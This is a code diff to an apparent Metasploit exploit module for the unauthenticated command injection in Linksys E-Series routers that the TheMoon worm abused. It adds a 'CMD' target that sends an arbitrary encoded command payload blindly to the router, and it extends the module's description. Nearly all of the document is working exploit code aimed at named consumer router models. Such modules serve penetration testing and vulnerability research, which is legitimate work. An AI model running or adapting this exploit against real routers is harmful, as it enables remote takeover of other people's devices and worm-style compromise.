CMD target

modules/exploits/linux/http/linksys_themoon_exec_echo.rb

@@ -16,8 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
       'Description' => %q{
           Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. This vulnerability was used from the so called "TheMoon" worm. There
-        are many Systems that might be vulnerable:
+        injection. Since it is a blind os command injection vulnerability, there is no
+        output for the executed command when using the cmd generic payload. A ping
+        command against a controlled system could be used for testing purposes. This
+        vulnerability was used from the so called "TheMoon" worm. There are many Systems
+        that might be vulnerable:
         E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
         module was tested against a E1500 v1.0.5.
       },
@@ -46,6 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
+          [ 'CMD',
+            {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix'
+            }
+          ],
           [ 'Linux mipsel Payload',
             {
             'Arch' => ARCH_MIPSLE,
@@ -107,6 +116,20 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
 
+    if target.name =~ /CMD/
+      if not (datastore['CMD'])
+        fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible")
+      end
+      cmd = payload.encoded
+      res = execute_command(cmd,"0")
+      if (!res)
+        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
+      else
+        print_status("#{peer} - Blind Exploitation - unknown Exploitation state")
+      end
+      return
+    end
+
     execute_cmdstager(
       :linemax => 26
     )